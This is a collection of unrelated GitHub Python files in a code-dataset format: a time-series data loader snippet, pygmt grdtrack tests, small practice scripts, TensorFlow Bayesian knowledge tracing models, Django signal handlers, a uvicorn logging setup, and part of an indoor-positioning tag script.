TimeSeriesDataset(occurrences=data_path+'Presence_only_occurrences/Presences_only_train_sample.csv',\n providers=[ts_red, ts_multi, ts_all])\n\n# print random tensors from dataset\nids = [random.randint(0, len(dataset)-1) for i in range(5)]\nfor id in ids:\n tensor = dataset[id][0]\n label = dataset[id][1]\n print('Tensor type: {}, tensor shape: {}, label: {}'.format(type(tensor), tensor.shape, label))\n dataset.plot_ts(id)","repo_name":"plantnet/GLC","sub_path":"example_time_series_loading.py","file_name":"example_time_series_loading.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"18915180130","text":"\"\"\"\nTests for grdtrack.\n\"\"\"\nimport os\n\nimport numpy.testing as npt\nimport pandas as pd\nimport pytest\nfrom pygmt import grdtrack, which\nfrom pygmt.datasets import load_earth_relief, load_ocean_ridge_points\nfrom pygmt.exceptions import GMTInvalidInput\nfrom pygmt.helpers import data_kind\n\nTEST_DATA_DIR = os.path.join(os.path.dirname(__file__), \"data\")\nTEMP_TRACK = os.path.join(TEST_DATA_DIR, \"tmp_track.txt\")\n\n\n@pytest.fixture(scope=\"module\", name=\"dataarray\")\ndef fixture_dataarray():\n \"\"\"\n Load the grid data from the sample earth_relief file.\n \"\"\"\n return load_earth_relief(registration=\"gridline\").sel(\n lat=slice(-49, -42), lon=slice(-118, -107)\n )\n\n\n@pytest.fixture(scope=\"module\", name=\"dataframe\")\ndef fixture_dataframe():\n \"\"\"\n Load the ocean ridge file.\n \"\"\"\n return load_ocean_ridge_points()\n\n\n@pytest.fixture(scope=\"module\", name=\"csvfile\")\ndef fixture_csvfile():\n \"\"\"\n Load the csvfile.\n \"\"\"\n return which(\"@ridge.txt\", download=\"c\")\n\n\n@pytest.fixture(scope=\"module\", name=\"ncfile\")\ndef fixture_ncfile():\n \"\"\"\n Load the ncfile.\n \"\"\"\n return which(\"@earth_relief_01d\", download=\"a\")\n\n\ndef test_grdtrack_input_dataframe_and_dataarray(dataarray, dataframe):\n \"\"\"\n Run grdtrack by passing in a pandas.DataFrame and xarray.DataArray as\n inputs.\n \"\"\"\n output = grdtrack(points=dataframe, grid=dataarray, newcolname=\"bathymetry\")\n assert isinstance(output, pd.DataFrame)\n assert output.columns.to_list() == [\"longitude\", \"latitude\", \"bathymetry\"]\n npt.assert_allclose(output.iloc[0], [-110.9536, -42.2489, -2790.488422])\n\n return output\n\n\ndef test_grdtrack_input_csvfile_and_dataarray(dataarray, csvfile):\n \"\"\"\n Run grdtrack by passing in a csvfile and xarray.DataArray as inputs.\n \"\"\"\n try:\n output = grdtrack(points=csvfile, grid=dataarray, outfile=TEMP_TRACK)\n assert output is None # check that output is None since outfile is set\n assert os.path.exists(path=TEMP_TRACK) # check that outfile exists at path\n\n track = pd.read_csv(TEMP_TRACK, sep=\"\\t\", header=None, comment=\">\")\n npt.assert_allclose(track.iloc[0], [-110.9536, -42.2489, -2790.488422])\n finally:\n os.remove(path=TEMP_TRACK)\n\n return output\n\n\ndef test_grdtrack_input_dataframe_and_ncfile(dataframe, ncfile):\n \"\"\"\n Run grdtrack by passing in a pandas.DataFrame and netcdf file as inputs.\n \"\"\"\n\n output = grdtrack(points=dataframe, grid=ncfile, newcolname=\"bathymetry\")\n assert isinstance(output, pd.DataFrame)\n assert output.columns.to_list() == [\"longitude\", \"latitude\", \"bathymetry\"]\n npt.assert_allclose(output.iloc[0], [-32.2971, 37.4118, -1939.748245])\n\n return output\n\n\ndef test_grdtrack_input_csvfile_and_ncfile(csvfile, ncfile):\n \"\"\"\n Run grdtrack by passing in a csvfile and netcdf file as inputs.\n \"\"\"\n try:\n output = grdtrack(points=csvfile, grid=ncfile, outfile=TEMP_TRACK)\n assert output is None # check that output is None since outfile is set\n assert os.path.exists(path=TEMP_TRACK) # check that outfile exists at path\n\n track = pd.read_csv(TEMP_TRACK, sep=\"\\t\", header=None, comment=\">\")\n npt.assert_allclose(track.iloc[0], [-32.2971, 37.4118, -1939.748245])\n finally:\n os.remove(path=TEMP_TRACK)\n\n return output\n\n\ndef test_grdtrack_wrong_kind_of_points_input(dataarray, dataframe):\n \"\"\"\n Run grdtrack using points input that is not a pandas.DataFrame (matrix) or\n file.\n \"\"\"\n invalid_points = dataframe.longitude.to_xarray()\n\n assert data_kind(invalid_points) == \"grid\"\n with pytest.raises(GMTInvalidInput):\n grdtrack(points=invalid_points, grid=dataarray, newcolname=\"bathymetry\")\n\n\ndef test_grdtrack_wrong_kind_of_grid_input(dataarray, dataframe):\n \"\"\"\n Run grdtrack using grid input that is not as xarray.DataArray (grid) or\n file.\n \"\"\"\n invalid_grid = dataarray.to_dataset()\n\n assert data_kind(invalid_grid) == \"matrix\"\n with pytest.raises(GMTInvalidInput):\n grdtrack(points=dataframe, grid=invalid_grid, newcolname=\"bathymetry\")\n\n\ndef test_grdtrack_without_newcolname_setting(dataarray, dataframe):\n \"\"\"\n Run grdtrack by not passing in newcolname parameter setting.\n \"\"\"\n with pytest.raises(GMTInvalidInput):\n grdtrack(points=dataframe, grid=dataarray)\n\n\ndef test_grdtrack_without_outfile_setting(csvfile, ncfile):\n \"\"\"\n Run grdtrack by not passing in outfile parameter setting.\n \"\"\"\n output = grdtrack(points=csvfile, grid=ncfile)\n npt.assert_allclose(output.iloc[0], [-32.2971, 37.4118, -1939.748245])\n\n return output\n","repo_name":"geodeepak/Pygmt","sub_path":"pygmt/tests/test_grdtrack.py","file_name":"test_grdtrack.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4610317003","text":"import time\r\nimport math\r\n\r\nsqr = []\r\nn = int(input('Enter the number: '))\r\nstart = time.monotonic()\r\nfor i in range(2, int(math.sqrt(n * 2)) + 1):\r\n sqr.append(i ** 2)\r\n \r\nlst = list(range(2, n + 1))\r\nseq = [1]\r\nind = 0\r\nfound = False\r\nwhile len(lst) != n:\r\n for i in range(ind, len(lst)):\r\n if lst[i] + seq[-1] in sqr:\r\n if len(lst) != 1:\r\n seq.append(lst[i])\r\n del lst[i]\r\n ind = 0\r\n break\r\n elif lst[i] + 1 in sqr:\r\n found = True\r\n seq.append(lst[i])\r\n del lst[i]\r\n ind = 0\r\n print(*seq)\r\n \r\n else:\r\n lst.append(seq[-1])\r\n lst.sort()\r\n ind = lst.index(seq[-1]) + 1\r\n del seq[-1]\r\n \r\nt = time.monotonic() - start\r\nif not found:\r\n print(\"No circle exists for the number\", n)\r\nprint(\"Time taken: {}s\".format(t))\r\n","repo_name":"Swag-coder/Swag-codes","sub_path":"Circle Sequence 3.py","file_name":"Circle Sequence 3.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17063225466","text":"# This is the day 10 0f the 100days of code ........\n# We are dealing with functions and later creating a calculator\n\n\ndef run_am(boy,girl=\",\"):\n\tif boy ==\"\" or girl==\"\":\n\t\treturn \"Please complete the fields and try again\"\n\t\n\treturn (girl +\" \"+boy)\n\n(run_am(\"joshua\",\"daniella\"))\n\n\n\n\ndef is_leap(year):\n\tif year%4==0:\n\t\tif year%100==0:\n\t\t\tif year% 400==0:\n\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\telse:\n\t\treturn False\n\ndef days_in_month(year,month) :\n\n\tmonth_days=[31,28,30,30,31,30,30,31,31,31,30,31]\n\n\tif is_leap(year) and month==2:\n\n\t\treturn f\"The number of days in month {month}/{year} is {29} \"\n\n\treturn f\"The number of days in month {month}/{year} is {month_days[month-1]} \"\n\nprint(days_in_month(year=2020,month=3))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Joshua357954/100-days-of-code-challange","sub_path":"Day 10/project10.py","file_name":"project10.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"606262717","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ========================================================\n# Author: qianlinliang\n# Created date: 7/28/18\n# Description: Models definition\n# ========================================================\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport logging\n\nfrom typing import Callable\nfrom datetime import datetime\n\ndef logit_fn(x: tf.Tensor):\n \"\"\" Inverse of sigmoid \"\"\"\n return np.log(x/(1-x))\n\nclass KTRNNCell(tf.nn.rnn_cell.RNNCell):\n\n def __init__(self,\n skill_nb: np.int32,\n transit_initializer: Callable,\n guess_initializer: Callable,\n slip_initializer: Callable,\n guess_max: tf.Tensor,\n slip_max: tf.Tensor,\n reuse=tf.AUTO_REUSE,\n name=None,\n dtype=tf.float32):\n \"\"\"\n Initialization of BKTRNNCell\n :param skill_nb: Number of skills\n :param transit_initializer: Function use to initialize transit probability\n :param guess_initializer: Function use to initialize guess probability\n :param slip_initializer: Function use to initialize slip probability\n :param corr_matrix: Correlation matrix, if None, use identical matrix\n \"\"\"\n super(KTRNNCell, self).__init__(_reuse=reuse, name=name, dtype=dtype)\n\n self._skill_nb = skill_nb\n self._transit_initializer = transit_initializer\n self._guess_initializer = guess_initializer\n self._slip_initializer = slip_initializer\n\n self._guess_max = guess_max\n self._slip_max = slip_max\n\n self._corr_weights = tf.eye(skill_nb, dtype=tf.float32)\n\n def build(self, _):\n # Add transit weights\n with tf.variable_scope(\"Standard_BKT_parameters\"):\n self._transit_weights = self.add_weight(name=\"transit_weights\", shape=[1, self._skill_nb],\n dtype=tf.float32, initializer=self._transit_initializer)\n\n # Add guess weights\n self._guess_weights = self.add_weight(name=\"guess_weights\", shape=[1, self._skill_nb],\n dtype=tf.float32, initializer=self._guess_initializer)\n\n # Add slip weights\n self._slip_weights = self.add_weight(name=\"slip_weights\", shape=[1, self._skill_nb],\n dtype=tf.float32, initializer=self._slip_initializer)\n\n def call(self, inputs, state):\n skills = inputs[1]\n observation = tf.reshape(inputs[2], [-1])\n\n # Extract variables\n # TODO: Try more combination functions\n with tf.name_scope(\"Standard_BKT_logic\"):\n p_l = tf.reduce_sum(skills*state, axis=1)/tf.reduce_sum(skills, axis=1)\n p_t = tf.sigmoid(tf.reduce_sum(skills*self._transit_weights, axis=1))\n\n p_s = tf.sigmoid(tf.reduce_sum(skills*self._slip_weights, axis=1))\n p_s = self._slip_max * p_s\n\n p_g = tf.sigmoid(tf.reduce_sum(skills*self._guess_weights, axis=1))\n p_g = self._guess_max * p_g\n\n # Main logic\n output = p_l * (1 - p_s) + (1 - p_l) * p_g\n p_l_ob = observation * (p_l * (1 - p_s)) / (p_l * (1 - p_s) + (1 - p_l) * p_g) \\\n + (1 - observation) * (p_l * p_s) / (p_l * p_s + (1 - p_l) * (1 - p_g))\n\n p_l_next = p_l_ob + (1 - p_l_ob) * p_t\n\n delta = p_l_next - p_l\n corr = tf.map_fn(lambda x: tf.reduce_max(x*self._corr_weights, axis=1), skills)\n corr = corr * tf.reshape(delta, [-1, 1])\n\n new_state = tf.clip_by_value(state + corr, clip_value_min=tf.constant(.0), clip_value_max=tf.constant(1.0))\n output = tf.reshape(output, [-1, 1]) # Keep the same shape with observation\n return output, new_state\n\n @property\n def output_size(self):\n return 1\n\n @property\n def state_size(self):\n return self._skill_nb\n\n @property\n def p_slip(self):\n return tf.sigmoid(self._slip_weights) * self._slip_max\n\n @property\n def p_guess(self):\n return tf.sigmoid(self._guess_weights) * self._guess_max\n\n @property\n def p_trasit(self):\n return tf.sigmoid(self._transit_weights)\n\n\nclass Corr_KTRNNCell(tf.nn.rnn_cell.RNNCell):\n\n def __init__(self,\n skill_nb: np.int32,\n transit_initializer: Callable,\n guess_initializer: Callable,\n slip_initializer: Callable,\n guess_max: tf.Tensor,\n slip_max: tf.Tensor,\n corr_matrix: np.ndarray = None,\n reuse=tf.AUTO_REUSE,\n name=None,\n dtype=tf.float32):\n \"\"\"\n Initialization of BKTRNNCell\n :param skill_nb: Number of skills\n :param transit_initializer: Function use to initialize transit probability\n :param guess_initializer: Function use to initialize guess probability\n :param slip_initializer: Function use to initialize slip probability\n :param corr_matrix: Correlation matrix, if None, use identical matrix\n \"\"\"\n super(Corr_KTRNNCell, self).__init__(_reuse=reuse, name=name, dtype=dtype)\n\n self._skill_nb = skill_nb\n self._transit_initializer = transit_initializer\n self._guess_initializer = guess_initializer\n self._slip_initializer = slip_initializer\n\n self._guess_max = guess_max\n self._slip_max = slip_max\n\n if corr_matrix is not None:\n self._corr_matrix = corr_matrix\n else:\n corr_matrix = np.ones(shape=(skill_nb, skill_nb)) * .1\n np.fill_diagonal(corr_matrix, .9999)\n self._corr_matrix = corr_matrix\n\n # self._corr_weights = tf.eye(skill_nb, dtype=tf.float32)\n\n def build(self, _):\n # Add transit weights\n with tf.variable_scope(\"Standard_BKT_parameters\"):\n self._transit_weights = self.add_weight(name=\"transit_weights\", shape=[1, self._skill_nb],\n dtype=tf.float32, initializer=self._transit_initializer)\n # Add guess weights\n self._guess_weights = self.add_weight(name=\"guess_weights\", shape=[1, self._skill_nb],\n dtype=tf.float32, initializer=self._guess_initializer)\n # Add slip weights\n self._slip_weights = self.add_weight(name=\"slip_weights\", shape=[1, self._skill_nb],\n dtype=tf.float32, initializer=self._slip_initializer)\n # Add corrlation matrix\n self._corr_weights = self.add_weight(name=\"corr_weights\",\n shape=[self._skill_nb, self._skill_nb],\n dtype=tf.float32,\n initializer=tf.constant_initializer(logit_fn(self._corr_matrix)))\n\n def call(self, inputs, state):\n skills = inputs[1]\n observation = tf.reshape(inputs[2], [-1])\n\n # Extract variables\n # TODO: Try more combination functions\n with tf.name_scope(\"Standard_BKT_logic\"):\n p_l = tf.reduce_sum(skills*state, axis=1)/tf.reduce_sum(skills, axis=1)\n p_t = tf.sigmoid(tf.reduce_sum(skills*self._transit_weights, axis=1))\n\n p_s = tf.sigmoid(tf.reduce_sum(skills*self._slip_weights, axis=1))\n p_s = self._slip_max * p_s\n\n p_g = tf.sigmoid(tf.reduce_sum(skills*self._guess_weights, axis=1))\n p_g = self._guess_max * p_g\n\n # Main logic\n output = p_l * (1 - p_s) + (1 - p_l) * p_g\n p_l_ob = observation * (p_l * (1 - p_s)) / (p_l * (1 - p_s) + (1 - p_l) * p_g) \\\n + (1 - observation) * (p_l * p_s) / (p_l * p_s + (1 - p_l) * (1 - p_g))\n\n p_l_next = p_l_ob + (1 - p_l_ob) * p_t\n\n delta = p_l_next - p_l\n corr = tf.map_fn(lambda x: tf.reduce_max(x*tf.sigmoid(self._corr_weights), axis=1), skills)\n corr = corr * tf.reshape(delta, [-1, 1])\n\n new_state = tf.clip_by_value(state + corr, clip_value_min=tf.constant(.0), clip_value_max=tf.constant(1.0))\n output = tf.reshape(output, [-1, 1]) # Keep the same shape with observation\n return output, new_state\n\n @property\n def output_size(self):\n return 1\n\n @property\n def state_size(self):\n return self._skill_nb\n\n @property\n def corr_matrix(self):\n return tf.sigmoid(self._corr_weights)\n\n @property\n def p_slip(self):\n return tf.sigmoid(self._slip_weights) * self._slip_max\n\n @property\n def p_guess(self):\n return tf.sigmoid(self._guess_weights) * self._guess_max\n\n @property\n def p_trasit(self):\n return tf.sigmoid(self._transit_weights)\n\n# Standard bayesian knowledge tracing model\nclass StandardBKTModel:\n def __init__(self, skill_nb: np.int, max_guess: np.float, max_slip: np.float,\n learned_init: np.float = None, transit_init: np.float = None,\n guess_init: np.float = None, slip_init: np.float = None,\n train_corr_matrix=True, corr_matrix=None, log_dir=None):\n \"\"\"\n Initialize BKT model\n :param skill_nb: The number of skills\n :param max_guess: Max guess probability\n :param max_slip: Max slip probability\n :param leanred_init: Initial value of learned parameters\n :param transit_init: Initial value of transit probability\n :param guess_init: Initial value of guess probability\n :param slip_init: Initial value of slip probability\n \"\"\"\n # TODO: Add value checker for parameters\n\n self._skill_nb = skill_nb\n self._max_guess = max_guess\n self._max_slip = max_slip\n self._learned_init = learned_init\n self._transit_init = transit_init\n self._guess_init = guess_init\n self._slip_init = slip_init\n self._train_corr = train_corr_matrix\n self._corr_matrix = corr_matrix\n\n # Create graph and session for this model\n self._sess = tf.Session()\n\n self._built = False\n\n # Configure logger\n self._logger = logging.getLogger(\"Standard_BKT_Model\")\n self._logger.setLevel(logging.INFO)\n\n stream_handler = logging.StreamHandler()\n file_handler = logging.FileHandler(os.path.join(log_dir, \"model.log\"))\n stream_handler.setLevel(logging.INFO)\n file_handler.setLevel(logging.WARNING)\n\n log_format = logging.Formatter(\"%(asctime)s %(name)s %(levelname)s %(message)s\")\n stream_handler.setFormatter(log_format)\n file_handler.setFormatter(log_format)\n\n self._logger.addHandler(stream_handler)\n self._logger.addHandler(file_handler)\n\n\n def _build(self):\n \"\"\" Build cell \"\"\"\n skill_nb = self._skill_nb\n transit_initializer = get_param_initializer(self._transit_init)\n guess_initializer = get_param_initializer(self._guess_init)\n slip_initializer = get_param_initializer(self._slip_init)\n\n if self._train_corr:\n self._cell = Corr_KTRNNCell(skill_nb=skill_nb,\n transit_initializer=transit_initializer,\n guess_initializer=guess_initializer,\n slip_initializer=slip_initializer,\n guess_max=tf.constant(self._max_guess, dtype=tf.float32),\n slip_max=tf.constant(self._max_slip, dtype=tf.float32),\n corr_matrix=self._corr_matrix)\n else:\n self._cell = KTRNNCell(skill_nb=skill_nb,\n transit_initializer=transit_initializer,\n guess_initializer=guess_initializer,\n slip_initializer=slip_initializer,\n guess_max=tf.constant(self._max_guess, dtype=tf.float32),\n slip_max=tf.constant(self._max_slip, dtype=tf.float32))\n\n\n with tf.name_scope(\"Initialize_learned_prob\"):\n if self._learned_init:\n self._init_state = tf.constant(self._learned_init, shape=[1, skill_nb], dtype=tf.float32)\n else:\n self._init_state = tf.random_uniform(shape=[1, skill_nb], maxval=1.0, minval=0.0,\n dtype=tf.float32)\n\n self._built = True\n\n def _predict_prob(self, inputs, sequence_length):\n \"\"\"\n Predict probability\n :param inputs: Nested tuple (student_id, skills, observation) with shape [batch_size * sequence_length * n]\n :return: predicted observations with shape [batch_size * sequence_length * 1]\n \"\"\"\n\n if not self._built:\n self._build()\n\n with tf.name_scope(\"predict_prob\"):\n batch_size = inputs[0].shape[0]\n init_state = tf.tile(self._init_state, [batch_size, 1], name=\"Initialize_state\")\n output, _ = tf.nn.dynamic_rnn(cell=self._cell, inputs=inputs, initial_state=init_state,\n dtype=tf.float32, sequence_length=sequence_length)\n return output\n\n def _losses(self, labels, predictions, seq_length):\n # Log loss\n seq_length_local = tf.cast(seq_length, dtype=tf.float32)\n labels_local = tf.cast(labels, dtype=tf.float32)\n pred_local = tf.cast(predictions, dtype=tf.float32)\n total_cnt = tf.reduce_sum(seq_length_local)\n\n losses = tf.losses.log_loss(labels=labels_local, predictions=pred_local, reduction=tf.losses.Reduction.NONE)\n return tf.reduce_sum(losses)/total_cnt\n\n def train(self, inputs, labels, iter_num, global_step=None, **kwargs):\n\n with tf.name_scope(\"train\"):\n train_X = inputs[:3]\n train_seq_length = inputs[3]\n predictions = self._predict_prob(train_X, train_seq_length)\n loss = self._losses(labels, predictions, train_seq_length)\n\n optimizer = tf.train.AdamOptimizer(**kwargs)\n train_op = optimizer.minimize(loss, global_step=global_step)\n correct_cnt_op, total_cnt_op = get_correct_and_total(labels, predictions, train_seq_length)\n\n rmse = get_metrics(labels, predictions, train_seq_length, tf.metrics.root_mean_squared_error)\n auc = get_metrics(labels, predictions, train_seq_length, tf.metrics.auc)\n\n tf.summary.scalar(\"losses\", loss)\n tf.summary.scalar(\"metrics/train_acc\", correct_cnt_op/total_cnt_op)\n tf.summary.scalar(\"metrics/rmse\", rmse)\n tf.summary.scalar(\"metrics/auc\", auc)\n tf.summary.histogram(\"pg\", self._max_guess * tf.sigmoid(self._cell._guess_weights))\n tf.summary.histogram(\"pt\", tf.sigmoid(self._cell._transit_weights))\n tf.summary.histogram(\"ps\", self._max_slip * tf.sigmoid(self._cell._slip_weights))\n merged_summaries = tf.summary.merge_all()\n\n sub_fold = \"corr_model\" if self._train_corr else \"standard_model\"\n\n writer = tf.summary.FileWriter(os.path.join(\"tensorboard/\", sub_fold), self._sess.graph)\n self._sess.run(tf.global_variables_initializer())\n self._sess.run(tf.local_variables_initializer())\n\n try:\n for i in range(iter_num):\n gs = self._sess.run(tf.train.get_global_step())\n _, summaries = self._sess.run([train_op, merged_summaries])\n\n losses, correct_cnt, total_cnt = self._sess.run([loss, correct_cnt_op, total_cnt_op])\n self._logger.info(\"Step: %d Train loss: %.4f; Train correct: %d; Train total: %d; Train acc: %.4f\"\n % (gs, losses, correct_cnt, total_cnt, correct_cnt/total_cnt))\n\n writer.add_summary(summaries, global_step=gs)\n\n except tf.errors.OutOfRangeError:\n self._logger.warning(\"Run out of training data, stop!\")\n pass\n\n writer.close()\n\n def predict(self, inputs, report_per_loop=5):\n predictions = []\n loop_cnt = 0\n start_time = datetime.now()\n while True:\n try:\n X = inputs[:3]\n seq_length = inputs[3]\n predictions.extend(self._sess.run(self._predict_prob(X, seq_length)))\n\n if loop_cnt % report_per_loop == 0:\n time_delta = (datetime.now() - start_time).seconds\n eff = time_delta / report_per_loop\n\n self._logger.info(\"Finished predict %d students, average speed: %.2fs/student\" % (loop_cnt, eff))\n start_time = datetime.now()\n loop_cnt += 1\n\n except tf.errors.OutOfRangeError:\n break\n return np.array(predictions)\n\n def get_slip_parameters(self):\n return self._sess.run(self._cell.p_slip)\n\n def get_guess_parameters(self):\n return self._sess.run(self._cell.p_guess)\n\n def get_transit_parameters(self):\n return self._sess.run(self._cell.p_trasit)\n\n def get_corr_matrix(self):\n return self._sess.run(self._cell.corr_matrix) if self._train_corr else None\n\n\ndef get_param_initializer(init_value):\n \"\"\" Helper function to build parameter initializer for BKT parameters\"\"\"\n if init_value:\n return tf.constant_initializer(logit_fn(init_value), dtype=tf.float32)\n else:\n return tf.truncated_normal_initializer(dtype=tf.float32)\n\n\ndef get_correct_and_total(labels: tf.Tensor,\n pred_prob: tf.Tensor,\n seq_length: tf.Tensor):\n \"\"\"\n Count correct predictions and total predictions\n :param labels: Ground true label\n :param pred_prob: predictions\n :param seq_length: sequence length\n :return correct, total:\n \"\"\"\n labels_local = tf.cast(labels, tf.float32)\n pred_prob_local = tf.cast(pred_prob, tf.float32)\n seq_length_local = tf.cast(seq_length, tf.float32)\n pred_prob_local = tf.round(pred_prob_local)\n correct_cnt_raw = tf.reduce_sum(tf.cast(tf.equal(labels_local, pred_prob_local), tf.float32))\n\n total_cnt = tf.reduce_sum(seq_length_local)\n dim_sum = tf.cast(tf.shape(labels)[0]*tf.shape(labels)[1], tf.float32)\n padding_cnt = dim_sum - total_cnt\n\n correct_cnt = correct_cnt_raw - padding_cnt\n\n return correct_cnt, total_cnt\n\n\ndef get_accuracy(labels, predictions, seq_length):\n \"\"\"\n Compute predict accuracy\n :param labels: True labels\n :param predictions: predictions\n :param seq_length:\n :return acc, correct, total:\n \"\"\"\n assert labels.shape == predictions.shape\n pred_bin = np.round(predictions)\n correct = np.sum(labels == pred_bin)\n\n size = labels.shape[0]*labels.shape[1]\n total = np.sum(seq_length)\n padding_size = size - total\n\n correct = correct - padding_size\n acc = correct/total\n\n return acc, correct, total\n\n\ndef flatten_with_seq_length(tensor, seq_length):\n \"\"\"\n Flatten the tensor by taking seq_length[i] elements for ith row\n :param tensor: tensor in shape [batch_size, max_seq_length]\n :param seq_length: the valid length for each row\n :return: tensor in shape [sum(seq_length), ]\n \"\"\"\n N = tf.shape(tensor)[0]\n tensor_2d = tf.reshape(tensor, shape=(N, -1))\n seq_length_local = tf.cast(seq_length, tf.int32)\n index = tf.constant(0, dtype=tf.int32)\n\n cond = lambda i, p: tf.less(i, N)\n body = lambda i, p: (i + 1, tf.concat([p, tensor_2d[i][:seq_length_local[i]]], axis=0))\n var = (index, tf.zeros(shape=(0,), dtype=tensor_2d.dtype))\n\n res = tf.while_loop(cond, body, var, shape_invariants=(index.get_shape(), tf.TensorShape([None])))\n return res[1]\n\n\ndef get_metrics(labels, predictions, seq_length, metircs_fn):\n \"\"\"\n Return ops to compute rmse\n :param labels: Ground true labels\n :param predictions: Prediction probabilities\n :param seq_length: valid sequence length\n :param metircs_fn: tf.metrics function\n :return: ops\n \"\"\"\n labels_flat = flatten_with_seq_length(labels, seq_length)\n predictions_flat = flatten_with_seq_length(predictions, seq_length)\n\n return metircs_fn(labels_flat, predictions_flat)[1]\n\n\ndef flatten_with_seq_length_num(arr: np.ndarray,\n seq_length: np.ndarray):\n \"\"\"\n Flatten ndarray\n :param arr: ndarray\n :param seq_length: valid length\n :return: ndarray in shape [sum(seq_length)]\n \"\"\"\n N = arr.shape[0]\n arr_2d = arr.reshape((N, -1))\n seq_length_local = seq_length.astype(np.int32)\n index = 0\n\n res = np.empty(shape=(np.sum(seq_length_local)))\n for i in range(N):\n res[index:index+seq_length_local[i]] = arr_2d[i][:seq_length_local[i]]\n index += seq_length_local[i]\n\n assert index == np.sum(seq_length_local), \"index does not reach the end\"\n return res\n\n\ndef get_metrics_num(labels, predictions, seq_length, metrics_fn):\n \"\"\"\n Compute metrics from numpy arrays\n :param labels: ndarray\n :param predictions: ndarray\n :param seq_length: ndarray\n :param metrics_fn: sklearn.metrics\n :return:\n \"\"\"\n labels_flat = flatten_with_seq_length_num(labels, seq_length)\n predictions_flat = flatten_with_seq_length_num(predictions, seq_length)\n\n return metrics_fn(labels_flat, predictions_flat)\n","repo_name":"qianlin404/correlation_BKT","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":21648,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21635899973","text":"# -*- coding: utf-8 -*-\n__author__ = 'HymanLu'\n\nfrom django.db.models.signals import post_save, post_delete\nfrom django.dispatch import receiver\nfrom rest_framework.authtoken.models import Token\nfrom django.contrib.auth import get_user_model\n\n\nfrom user_operation.models import UserFav\n\n\n@receiver(post_save, sender=UserFav)\ndef create_userfav(sender, instance=None, created=False, **kwargs):\n if created:\n goods = instance.goods\n goods.fav_num += 1\n goods.save()\n\n\n@receiver(post_delete, sender=UserFav)\ndef delete_userfav(sender, instance=None, created=False, **kwargs):\n goods = instance.goods\n goods.fav_num -= 1\n goods.save()\n","repo_name":"gh877916059/drf-Vue-website","sub_path":"back-end-src/apps/user_operation/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"53"} +{"seq_id":"19066258644","text":"import logging.config\n\nimport uvicorn\n\nfrom fastapi_auth_service.api.http import app\nfrom fastapi_auth_service.conf import settings\n\n\nLOGGING_CONFIG = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'default': {\n '()': 'python3_commons.logging.formatter.JSONFormatter',\n },\n },\n 'filters': {\n 'info_and_below': {\n '()': 'python3_commons.logging.filters.filter_maker',\n 'level': 'INFO'\n }\n },\n 'handlers': {\n 'default_stdout': {\n 'level': settings.logging_level,\n 'class': 'logging.StreamHandler',\n 'stream': 'ext://sys.stdout',\n 'formatter': 'default',\n 'filters': ['info_and_below', ],\n },\n 'default_stderr': {\n 'level': 'WARNING',\n 'class': 'logging.StreamHandler',\n 'stream': 'ext://sys.stderr',\n 'formatter': 'default',\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['default_stderr', 'default_stdout', ],\n },\n 'fastapi_auth_service': {\n 'handlers': ['default_stderr', 'default_stdout', ],\n 'level': settings.logging_level,\n 'propagate': False,\n },\n '__main__': {\n 'handlers': ['default_stderr', 'default_stdout', ],\n 'level': settings.logging_level,\n 'propagate': False,\n }\n }\n}\nlogging.config.dictConfig(LOGGING_CONFIG)\n\nuvicorn.run(app, host=settings.service_addr, port=settings.service_port, proxy_headers=True, log_config=LOGGING_CONFIG)\n","repo_name":"kamikaze/fastapi-auth-service","sub_path":"src/fastapi_auth_service/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"30146984610","text":"# tagFunc\n\"\"\"This function determines the tag position matrix\"\"\"\n\nimport socket\nimport numpy as np\nimport sys\nimport re\nimport json\nimport time\nfrom json import JSONDecoder\n\n\n########################################################################################\ndef find(s, ch):\n \"\"\"This function returns all instances of the substring in a given input string\"\"\"\n return [i for i, ltr in enumerate(s) if ltr == ch]\n########################################################################################\n\n\n# OpenRTLS API commands\nlistTags = '{\\\"command\\\":\\\"listTags\\\"}'\n\n\ndef tagFunc(buffSize, tagMat, tagNames, ancNames, ancNum, TCP_IP, TCP_PORT, UDP_IP, UDP_PORT):\n\n\n # Define and initialize a tag counter\n tagNum = 0\n\n # Open the socket and request a tag list\n tcpSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n tcpSock.connect((TCP_IP, TCP_PORT))\n tcpSock.send(listTags.encode())\n print('\\nRequesting tag list from master')\n time.sleep(0.5)\n data = tcpSock.recv(1024).decode(\"utf-8\")\n\n\n # Now pull out the tag names\n doc = json.loads(data) \n for tag in doc['tags']:\n\n # Current tag name\n tagNames.append(tag['id'])\n tagNum += 1\n\n\n # Tell the user which tags have been found\n print('\\nThe following tags were found')\n print('\\n')\n print(tagNames)\n \n\n # Check if there's more than one tag and ask which to use \n if tagNum != 1:\n useTag = input('\\nPlease enter the tag ID which you want to use to define the field: ')\n \n # Check if useTag is in the list of tags\n while useTag not in tagNames:\n print('\\nYou have entered a tag not in the list\\n')\n useTag = input('\\nPlease enter the tag ID which you want to use to define the field: ')\n print('\\nWe will now take three measurements using tag ',useTag)\n 